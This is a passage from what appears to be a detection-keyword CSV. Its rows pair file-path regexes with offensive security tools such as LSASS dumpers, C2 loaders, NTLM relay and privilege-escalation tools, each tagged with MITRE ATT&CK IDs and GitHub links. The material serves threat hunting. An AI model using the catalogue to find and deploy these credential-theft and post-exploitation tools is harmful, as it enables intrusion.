T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - 
T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\LNKUp\generate.py*",".{0,1000}\\LNKUp\\generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*\loader.x64.exe*",".{0,1000}\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*\Loader\Loader.csproj*",".{0,1000}\\Loader\\Loader\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*\Local\Temp\logins.log*",".{0,1000}\\Local\\Temp\\logins\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - 
T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\local_admins.csv*",".{0,1000}\\local_admins\.csv.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\local_execution_linux.exe*",".{0,1000}\\local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\local_map.exe*",".{0,1000}\\local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\local_thread_hijacking.exe*",".{0,1000}\\local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - 
T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\LocalAdminAccess.txt*",".{0,1000}\\LocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\LocalAdminSharp.sln*",".{0,1000}\\LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*\localbrute.ps1*",".{0,1000}\\localbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\LocalPotato\*.cpp*",".{0,1000}\\LocalPotato\\.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local 
authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\LocalPotato\*.exe*",".{0,1000}\\LocalPotato\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\LocalPrivEsc\*",".{0,1000}\\LocalPrivEsc\\.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\LocalShellExtParse.py*",".{0,1000}\\LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*\LocalShellExtParse-master*",".{0,1000}\\LocalShellExtParse\-master.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*\LockLess.exe*",".{0,1000}\\LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\loginAAD.ps1*",".{0,1000}\\loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\logon_backdoor\*",".{0,1000}\\logon_backdoor\\.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\logon_backdoor-master*",".{0,1000}\\logon_backdoor\-master.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\LogonScreen.exe*",".{0,1000}\\LogonScreen\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*\lolbin.exe*",".{0,1000}\\lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\LOLSpoof.nim*",".{0,1000}\\LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\LOLSpoof\*",".{0,1000}\\LOLSpoof\\.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*\lookup-sid.py*",".{0,1000}\\lookup\-sid\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\looneypwner.sh*",".{0,1000}\\looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*\lsarelayx.cpp*",".{0,1000}\\lsarelayx\.cpp.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\lsarelayx.csproj*",".{0,1000}\\lsarelayx\.csproj.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\lsarelayx.sln*",".{0,1000}\\lsarelayx\.sln.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\lsass.DMP",".{0,1000}\\lsass\.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\lsass.rar*",".{0,1000}\\lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\lsass.zip*",".{0,1000}\\lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the 
dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\Lsass_Shtinkering.cpp*",".{0,1000}\\Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASS_Shtinkering.sln*",".{0,1000}\\LSASS_Shtinkering\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASS_Shtinkering\*",".{0,1000}\\LSASS_Shtinkering\\.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LSASSProtectionBypass\*",".{0,1000}\\LSASSProtectionBypass\\.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*\Lsass-Shtinkering-main*",".{0,1000}\\Lsass\-Shtinkering\-main.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files 
(without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*\LsassSilentProcessExit*",".{0,1000}\\LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\lsassy_dump.py*",".{0,1000}\\lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\luajit.exe*",".{0,1000}\\luajit\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\LyncSniper.ps1*",".{0,1000}\\LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*\m3-gen.py*",".{0,1000}\\m3\-gen\.py.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*\MaccaroniC2*",".{0,1000}\\MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*\MachineAccountQuota.py*",".{0,1000}\\MachineAccountQuota\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\macoffe.pdb*",".{0,1000}\\macoffe\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - 
T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\macro64.vba*",".{0,1000}\\macro64\.vba.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*\maildump.txt*",".{0,1000}\\maildump\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\MakeMeEnterpriseAdmin.ps1",".{0,1000}\\MakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain 
environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\malDll.dll*",".{0,1000}\\malDll\.dll.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\malseclogon.*",".{0,1000}\\malseclogon\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\MalStuff.cpp*",".{0,1000}\\MalStuff\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\malware_runner.py*",".{0,1000}\\malware_runner\.py.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" 
"*\manspider_*.log*",".{0,1000}\\manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*\masky.py*",".{0,1000}\\masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\masscan\src\*",".{0,1000}\\masscan\\src\\.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 